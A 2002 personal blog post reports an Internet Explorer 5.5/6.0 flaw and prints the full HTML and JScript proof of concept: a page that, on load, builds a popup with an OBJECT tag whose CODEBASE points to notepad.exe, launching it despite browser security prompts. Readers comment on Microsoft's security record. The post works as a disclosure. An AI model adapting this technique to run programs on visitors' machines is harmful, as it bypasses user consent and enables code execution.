play @ static·red | darren james harkness

Current Projects

Edmonton Weather

>>Le blog.

speakeasy archives

love that IE security...

<< it's a miracle! | Main | it's groovy >>

ie6 security issue

This page will open a copy of notepad.exe on your Win2k/XP (and probably '98) system in IE 5.5, and 6.0. It also seems to work around any security settings in the browser; I have IE set to prompt me any time a script calls an external program - IE completely ignored the security settings and ran the program happily.

Good to see such things out of a company that's focussing on security. Here's the source, so you don't have to go to the site:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE>IE6 security...</TITLE> <META http-equiv=Content-Type content="text/html; charset=windows-1252"> <SCRIPT language=JScript> var programName=new Array( 'c:/windows/system32/notepad.exe', 'c:/winnt/system32/notepad.exe' ); function Init(){ var oPopup=window.createPopup(); var oPopBody=oPopup.document.body; var n,html=''; for(n=0;n<programName.length;n++) html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>"; oPopBody.innerHTML=html; oPopup.show(290, 190, 200, 200, document.body); } </SCRIPT> </head> <BODY onload="Init()"> </BODY> </HTML>

Posted by Darren James Harkness on Monday, March 4, 2002 09:43 AM

Trackbacks...

Comments:
>> Darren » Monday, March 4, 2002 10:02 AM

Update: The latest round of updates on windowsupdate.com does not fix this issue.

>> arcterex » Monday, March 4, 2002 11:30 AM

The ms problem has been, and always will be, that they can't seem to get security and userfriendliness to go nicely togeather. If being userfriendly means that you have web enabled [x], and if having web enabled [x] could be mis-used, guess which wins out.

They can focus on trying to prevent certain things from happening, but chances are those functions were put there for a reason (making the user go 'cool' for example) in the first place. Because of this, MS will prevent other people from using them, but leave them open for themselves. Of course, you can see how this could be a problem :)

>> Darren » Monday, March 4, 2002 11:45 AM

Of course, the whole reason this exploit made it in, is due to MS integrating explorer.exe and iexplore.exe, to try and defeat the whole antitrust suits... ;)

Post a comment
* under no circumstances will your email address be traded for a sack of quarters. No-sirree.

Get around

» Archives
» Ask the Comic Book Guy

» Friends

    alan
    Christie
    delmar
    chrissie
    brian
    orion
    four colour commentary
    joe
    julie
    pam
    karen
    kevin e.
    anders
    dana
    natalie
    barry
    stephen
    michael
    dan
    dave

» Recommended

    hoshq
    dooce
    lance arthur
    leslie harpold
    the morning news
    littleyellowdifferent
    bluishorange
    martha
    ev
    zannah
    a flight risk
    jayme
    natalie-dee!
    harrumph
    d100.ca
    Photojunkie
    exploding dog
    low resolution
    [sub]Pixel.ca
    exitwound
    WoMD
    Vanilla Lime
    28mm.org

» Comics

    userfriendly
    sluggy
    GPF
    Angst Tech
    penny arcade
    goats
    sinfest

» News

    cnn
    google news
    indy news uk
    cbc
    geeknews
    slashdot
    ufies
    abbynews

» Archives by category

» Beginnings
» Blogs
» CSS and HTML
» Climbing
» Design
» Good Writing
» Hiking
» House
» Humour
» Miscellaneous
» Personal
» Photography
» Politics
» School
» Science
» Scripting
» Security
» Site changes
» Technology
» Writing

The content on this site is licensed under a Creative Commons license.